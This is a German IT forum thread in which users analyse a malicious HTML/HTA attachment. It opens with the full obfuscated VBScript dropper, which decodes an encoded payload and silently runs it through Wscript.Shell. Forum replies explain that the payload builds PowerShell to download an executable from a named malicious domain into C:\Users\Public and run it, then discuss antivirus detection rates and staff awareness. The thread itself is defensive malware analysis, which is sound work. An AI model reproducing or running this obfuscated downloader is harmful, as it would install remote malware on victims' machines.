ePsNoAmjtS = m_zbbHqyFirstSwitch
End Function
Public Function WekLPwHdDdFxFC(zbbHqy)
Dim LBbaeCl
WekLPwHdDdFxFC = ""
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
WekLPwHdDdFxFC = kuht(zbbHqy)
End If
End If
End Function
Public Function nqqUcB(zbbHqy)
nqqUcB = False
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
nqqUcB = True
End If
End If
End Function
Function POWFfvlDUGnQKML(rXGpeBkQr, FFeeFUszA)
On Error Resume Next
Dim VCExVaLW
Dim yTFSCNnrqtQkqcP
Dim mRZosmAicTgzA
For VCExVaLW = 1 To Len(rXGpeBkQr)
yTFSCNnrqtQkqcP = Mid(rXGpeBkQr, VCExVaLW, 1)
mRZosmAicTgzA = Asc(yTFSCNnrqtQkqcP)
mRZosmAicTgzA = mRZosmAicTgzA Xor Len(FFeeFUszA)
mRZosmAicTgzA = Chr(mRZosmAicTgzA)
POWFfvlDUGnQKML = POWFfvlDUGnQKML & mRZosmAicTgzA
Next
End Function
Function EAUJUQrlcGEWwFG(laGuwzQrkd)
EAUJUQrlcGEWwFG = Len(laGuwzQrkd)
End Function
Public Function ePsNoAmjtS()
ePsNoAmjtS = m_zbbHqyFirstSwitch
End Function
Public Function WekLPwHdDdFxFC(zbbHqy)
Dim LBbaeCl
WekLPwHdDdFxFC = ""
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
WekLPwHdDdFxFC = kuht(zbbHqy)
End If
End If
End Function
Public Function nqqUcB(zbbHqy)
nqqUcB = False
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
nqqUcB = True
End If
End If
End Function
Function AujSipdmcfmtIZ(GYDozL, xbZuLutP)
Dim VAIXQ
Dim vgDKwiF
Dim cWBqjCKwBl
Dim CBnhtvROBWJf
Dim VdNmpUUu
Dim uOatMJ
Dim GkdMVutOqmk
Dim fqcaXNK
Dim StBHym
Dim NDXnaxDDQ
Dim iXQiRtcgmWEUplc
CBnhtvROBWJf = 2
VAIXQ = EAUJUQrlcGEWwFG(GYDozL)
VdNmpUUu = 8
uOatMJ = 16 * 4
For cWBqjCKwBl = 1 To VAIXQ Step 4
Dim zIlis
Dim OaRRODd
Dim WuFeJHdca
Dim MmrJRSmq
Dim EgnwkcNgcIgofn
Dim dzYTBeK
Dim xuRJndLZwLYPC
Dim URJApvGRUMy
Dim lpIcVNAjHiIgkw
Dim ONOzKt
Dim SdwnMSAxfcsNR
zIlis = 3
EgnwkcNgcIgofn = 0
For OaRRODd = 0 To 3
WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)
If WuFeJHdca = "=" Then
zIlis = zIlis - 1
MmrJRSmq = 0
Else
MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
End If
EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq
Next
EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn
dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _
Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _
Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))
vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)
Next
AujSipdmcfmtIZ = vgDKwiF
End Function
Public Function ePsNoAmjtS()
ePsNoAmjtS = m_zbbHqyFirstSwitch
End Function
Public Function WekLPwHdDdFxFC(zbbHqy)
Dim LBbaeCl
WekLPwHdDdFxFC = ""
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
WekLPwHdDdFxFC = kuht(zbbHqy)
End If
End If
End Function
Public Function nqqUcB(zbbHqy)
nqqUcB = False
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
nqqUcB = True
End If
End If
End Function
Function TaxhEpkSsiupfA()
Dim xbZuLutP
Dim JeFugEc
Dim ArjFeoNni
Dim BWeKrnacwCPvJ
Dim odBxqfFoyO
Dim GjzjzpbRUu
Dim ikTHOjnXN
Dim JtPon
Dim sDaoqr
Dim zKJoEXQ
Dim ZjQtmyV
Dim wqLPxt
JeFugEc = "HTML"
xbZuLutP = "EFG@ABCLMNOHIJKTUVWPQRS\]^efg`abclmnohijktuvwpqrs|}~45670123<=/+"
xbZuLutP = POWFfvlDUGnQKML(xbZuLutP, JeFugEc)
ArjFeoNni = "c@G93ZX*JzaGVs#bC5leG@UgLUV#4ZWN1d*Glvb*lBv@bGl*jeS@BVbl@Jlc3Ry@aWN0ZW#QgLVdp@bmRvdy*AxI@Ft2b#2lkX*SAkbn@VsbDsk@a2xmeW*Ntc*Hdie#G4gPSB*HZXQt@UmFuZG#9tIC*1Na*W4gMy#AtTW@F4ID#Q7JH*RnaGJy*a3NjID#0gK#Ftja@GFyW11*dKFt#jaGFyX#Tk3Li*5bY2h@hcl@0xM#jIpKTs@kbGRle@mlr#ID0gLW*pva#W4g*KCR0@Z2hic*mtz#YyB8I*Edl@dC1SYW@5kb2*0gLUN#vdW@50I#CRrb#GZ5Y21@wd2J4@biB8IC#Uge1tD@aGF*yXS@Rff@Sk7JG*5sc3#Zme@msgPS*BbY#2hhc#l0we@DJlK#1tja*GFyXTB*4Nj*UrW2No@YXJdMH#g3OCtb@Y2h*hcl*0we*DY1OyR*jdnho*cHptZ3#NpID0@gJGxk#ZXpp#ayArI*CRubHN@2Zn*prO*yRr@YWNi@dXh*mbD1bY@2hhc@l0we#DUzK1t@jaGF@yXTB4*NjErW*2NoYX#JdMHg0#YzskZW#d5Zn@doc@HFr#PVtj@aGFyX@TB4ND*krW2No*YXJdMH#g0NSt@bY2h@hcl0w@eDU4O@yRzaGt@ueHFv@cj1b*Y2h@hcl0we*DczK#1tja#GFyXT*B4ND*ErW2N*oYXJd*MHg3M#Ctb#Y2hhc#l0w#eDUzO*3NBT#CB4b@HFy#aWp2#ZmttaG@QgJGth*Y2J*1eG@ZsOy@R2d2l#nbnFs*bXh#iPVtj@aGF#yXT#B4NGUr@W2NoY*XJdMHg#2NStb@Y2hh*cl0weD#c0K#1tjaGF*yXTB4M@mUrW@2NoYX#JdMHg#1Ny@tbY2*hhc@l0w#eDY@1K1tj@aGF#yXTB4@NjIr#W2NoY#XJdMH@g0My@tbY*2hhcl0*weDZ@jK1t*jaGFyX*TB4N#jkrW2N*oYXJd*MHg*2NStbY#2hh*cl0we*DZlK1t@jaGF@yXTB4#NzQ7#eGx#xcm@lqd*mZrb#Whk#IGx3e@W5iam*cgJGVn#eWZ3a@HBxaz*skcGh*hd3Nx#b2t*pamM*9W2No*YXJdM*HgyNCt#bY2hhc@l0weD@Y1K@1tj@aGF@yXTB4N*mUrW2N#oYX#JdM@Hg3N#itb*Y2hhcl*0weD#NhK1*tjaGF#yXTB4*NTArW2*NoYXJ*dMHg1N@StbY2*hhcl0w@eDQy*K1tjaG@FyXTB#4NGMrW#2NoY#XJdMH*g0OStb*Y2hhc@l0weD*QzfG#x3eW@5iam*c7eGx*xcm@lqdm@ZrbW@hkI@HJh*Z2J3@aGxt*YyA#kc2hrb@nhxb#3I7J#Ghjbm*pidSA#9ICRwa#GF3c3F*va2@lqYyAr#IFtjaG*FyXTB*4NW#MgKy@AkY3@Z4aH@B6bW@dzaTs*7Ozsk*cnl2am@9iZ*2VwID#0gJ#2FI#UjBjRG*92T@DJkaGV@tRn#pkSEp*wY0*hSb*FlYTmx*MblJ#2Y0M5*MGNpMX#pkR0@ZzYk#dWeUxt*VjR*aUT09*Jzsk*cnl2am#9iZ2@VwP#VtTeXN@0ZW0uV@GV4#dC5F#bmNv#ZGluZ1*06O*lVURj*guR2V0@U3RyaW*5nKFt@TeX*N0ZW0#uQ2@9udmV*ydF*06OkZy@b21CY#XNlN@jRTdHJ@pbm@coJH*J5d#mpvYmd#lcC@kpOyR#oaW1kY*WsgP*SBOZXc*tT2Jq#ZWN0I@CR2d2l#nbn#FsbXhi#OyR0#amR1*b3hmI#D0gJ#Ghp#bWRh@ay5#Eb3d#ubG9h#ZER#hdGEo@JHJ5d*mpvYm@dlcCk#7W0lPL@kZp*bGV*dOjpXc@ml0ZUF#sbE#J5dG*VzKC*RoY2*5qYn@UsI@CR0am@R1b*3hmKT#tyYWd@id2*hsbWM*gJGh#jbmpi#dTs7JG#55a*HNjZHY*gPS#BAKCRw#dW9o#eWV#kY25#6aiwg#JHRza*2VhL*CAka#mZjd@m8sICR#wZml*3Z2wpO#2ZvcmV@hY2#goJG1#4amh6@c2J3eS@Bpb*iAkbnl@oc2*Nkdi*l7J@G51@bGw*gPSAkX#30iIg*=="
ArjFeoNni = JpAoAEKRCC(ArjFeoNni)
BWeKrnacwCPvJ = AujSipdmcfmtIZ(ArjFeoNni, xbZuLutP)
set odBxqfFoyO = CreateObject("Wscript.Shell")
odBxqfFoyO.Run(BWeKrnacwCPvJ),0,true
self.close()
End Function
TaxhEpkSsiupfA()
Public Function ePsNoAmjtS()
ePsNoAmjtS = m_zbbHqyFirstSwitch
End Function
Public Function WekLPwHdDdFxFC(zbbHqy)
Dim LBbaeCl
WekLPwHdDdFxFC = ""
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
WekLPwHdDdFxFC = kuht(zbbHqy)
End If
End If
End Function
Public Function nqqUcB(zbbHqy)
nqqUcB = False
If IsNumeric(zbbHqy) Then
If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
nqqUcB = True
End If
End If
End Function
</script>
</head>
<div>
</div>
<body>
</body>
</html>Virustotal meldet bei der URL nur zwei (von 71) Treffer als "SPAM"!
bei der zipdatei schlagen 22 von 55 als Trojaner an.
lks
Mal schnell analysiert:
Der VBA Code erstellt wieder Powershell-Code führt diesen aus und dieser lädt wieder über verschleierten PS Code diese EXE aus dem Web:
h t t p://gazastriptease.top/tr-staller.exe
nach
C:\Users\Public\qmh.exe
herunter und führt diese aus.
Und nur drei bei Virus-Total sehen die EXE bisher als SPAM oder Malicous an
https://www.virustotal.com/gui/url/1350739e0505e13b17df677b1f2cf948a65ff ...
Der VBA Code erstellt wieder Powershell-Code führt diesen aus und dieser lädt wieder über verschleierten PS Code diese EXE aus dem Web:
h t t p://gazastriptease.top/tr-staller.exe
nach
C:\Users\Public\qmh.exe
herunter und führt diese aus.
Und nur drei bei Virus-Total sehen die EXE bisher als SPAM oder Malicous an
https://www.virustotal.com/gui/url/1350739e0505e13b17df677b1f2cf948a65ff ...
Da gibt sich aber jemand BÖSES wirklich BÖSE Mühe.
@140447
Danke für die schnelle Analyse.
Gruss Penny.
@140447
Danke für die schnelle Analyse.
Gruss Penny.
Zitat von @140447:
Mal schnell analysiert:
Der VBA Code erstellt wieder Powershell-Code führt diesen aus und dieser lädt wieder über verschleierten PS Code diese EXE aus dem Web:
h t t p://gazastriptease.top/tr-staller.exe
nach
C:\Users\Public\qmh.exe
herunter und führt diese aus.
Mal schnell analysiert:
Der VBA Code erstellt wieder Powershell-Code führt diesen aus und dieser lädt wieder über verschleierten PS Code diese EXE aus dem Web:
h t t p://gazastriptease.top/tr-staller.exe
nach
C:\Users\Public\qmh.exe
herunter und führt diese aus.
danke für das nachforschen. Hatte noch nicht die Zeit, das weiter zu verfolgen.
lks
Jetzt sinds zumindest schon mal 13 Scanner die ihn erkennen. Nachdem ich einigen das Sample mal übermittelt habe.
Zitat von @140447:
Jetzt sinds zumindest schon mal 13 Scanner die ihn erkennen. Nachdem ich einigen das Sample mal übermittelt habe.
Jetzt sinds zumindest schon mal 13 Scanner die ihn erkennen. Nachdem ich einigen das Sample mal übermittelt habe.
Bestätigt meine These, daß Schlangenöl nur vor gut abgehangenem Zeugs schützt.
Viel wichtiger ist die Sensibilisierung der Mitarbeiter und vor allem diesen bewßt zu machen, daß ein
lks
Jepp, leider besteht die Mehrheit der Mitarbeiter in vielen Fällen aus "RTL"-Zuschauern , und denen Verstand beizubringen, Lebensaufgabe .
, und denen Verstand beizubringen, Lebensaufgabe .Zitat von @140447:
Jepp, leider besteht die Mehrheit der Mitarbeiter in vielen Fällen aus "RTL"-Zuschauern, und denen Verstand beizubringen, Lebensaufgabe .
Jepp, leider besteht die Mehrheit der Mitarbeiter in vielen Fällen aus "RTL"-Zuschauern
, und denen Verstand beizubringen, Lebensaufgabe .Manch einer guggt auch RTL - und wenn's nur die Nachrichten (RTL Aktuell) sind.
